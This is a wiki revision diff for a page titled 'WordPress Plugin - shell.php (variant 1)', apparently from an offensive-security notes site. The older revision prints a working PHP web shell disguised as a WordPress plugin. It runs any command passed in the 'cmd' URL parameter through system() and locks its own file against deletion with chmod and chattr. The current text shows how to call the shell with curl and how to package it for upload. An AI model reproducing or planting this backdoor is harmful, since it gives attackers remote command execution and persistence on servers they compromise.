Difference between revisions of "WordPress Plugin - shell.php (variant 1)"

(Created page with "<syntaxhighlight lang=php line> <?php * * @package My_Shell * @version 1.0: /* Plugin Name: My Shell Plugin URL: http://google.com Description: A quick shell plugin Aut...")
 
m
 
(9 intermediate revisions by the same user not shown)
Line 1: Line 1:
<syntaxhighlight lang=php line>
+
The following file can be used as WordPress plugin or geneneric system call interface. Commands should be url-encoded, passed via 'cmd' param.
<?php
 
/**
 
* @package My_Shell
 
* @version 1.0
 
*/
 
/*
 
Plugin Name: My Shell
 
Plugin URL: http://google.com
 
Description: A quick shell plugin
 
Author: ZeGnar
 
Version: 1.0
 
*/
 
  
# prevent file deletion
+
E.g.
$myfile = __FILE__;
+
<syntaxhighlight lang=shell-session line>
system("chmod ugo-w $myfile");
+
curl -G "http://192.168.56.103/wp-content/plugins/shell1/shell.php" --data-urlencode "cmd=ls -altrh"
system("chattr +i $myfile");
+
</syntaxhighlight>
$command=urldecode($_GET["cmd"]);
 
  
if (class_exists('ReflectionFunction')) {
+
Enough with intros so here's the code. 
$function = new ReflectionFunction('system');
+
{{#github:webshells/wp_shell1.php|blaksec/sectools|master|php|line=1|start=1}}
$function->invoke($command);
 
} elseif (function_exists('call_user_func_array')) {
 
call_user_func_array('system', array($command));
 
} elseif (function_exists('call_user_func')) {
 
call_user_func('system', $command);
 
} else {
 
system($command);
 
}
 
?>
 
  
 +
Now just tar it up and it's ready to go
 +
<syntaxhighlight  lang=shell-session highlight="" line>
 +
tar -zcvf ./shell.tgz shell.php
 
</syntaxhighlight>
 
</syntaxhighlight>

Latest revision as of 21:42, 17 July 2018

The following file can be used as WordPress plugin or geneneric system call interface. Commands should be url-encoded, passed via 'cmd' param.

E.g.

curl -G "http://192.168.56.103/wp-content/plugins/shell1/shell.php" --data-urlencode "cmd=ls -altrh"

Enough with intros so here's the code.

Moved Permanently. Redirecting to https://cdn.jsdelivr.net/gh/blaksec/sectools@master/webshells/wp_shell1.php

Now just tar it up and it's ready to go

tar -zcvf ./shell.tgz shell.php